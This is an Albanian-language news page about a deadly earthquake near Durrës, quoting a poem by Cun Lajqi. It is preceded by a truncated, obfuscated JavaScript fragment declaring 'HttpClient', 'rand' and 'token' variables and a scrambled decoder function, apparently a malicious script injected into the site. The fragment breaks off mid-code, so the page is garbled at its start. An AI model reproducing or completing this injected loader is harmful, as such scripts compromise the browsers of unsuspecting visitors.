;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Çun Lajqi rrëqeth me vargjet kushtuar tragjedisë natyrore në Shqipëri

By

Sot, Shqipëria u trondit nga tërmeti që rezulton të jetë më i forti nga 100 vjetët e fundit.

Pamje nga Durrësi.
Hektor Pustina (AP)

Një tërmet 6.4 i shkallës Rihter goditi Shqipërinë, në afërsi të Durrësit, në orët e para të mëngjesit të së martës. Raportohet për viktima në njerëz dhe shkatërrime të shumë ndërtesave.

Në momente si këto njerëzit janë solidarizuar për t’iu ardhur në ndihmë të prekurve dhe atyre që iu përgjigjën të parët tragjedisë në aksione shpëtimi.

Edhe Cun Lajqi i njohur për rreshtat e bukur që thur, postoi në llogarinë e tij në Facebook një poezi:

“Shqipnisë sime t’luhatun

Kur dridhesh ti
Ne s’bajmë gjumë Shqipni
Se tutemi po vdes
E rrajë jetimash mbesim
Të duem edhe kur vërshohesh
Ujnash
Edhe kur digjesh
Zjarresh
Edhe kur mallkohesh nesh
Kur luhatesh
Dridhesh e përkundesh
Tërmetesh
Si zogj t’futemi n’gji
E lutemi
Vetëm ti t’mos vdes
Ne
S’bajmë gjumë kur ti dridhesh
Se veç Ty t’kemi Shqipni”

Raportohet deri tani për 20 të vdekur dhe 600 të plagosur.  Epiqendra e tërmetit ishte 10 kilometra nga Durrësi dhe 31 kilometra nga Tirana. /Prive.al

Pamje nga një ndërtesë e shkatërruar në Durrës.
Reuters

 

 

Artikuj të ngjashëm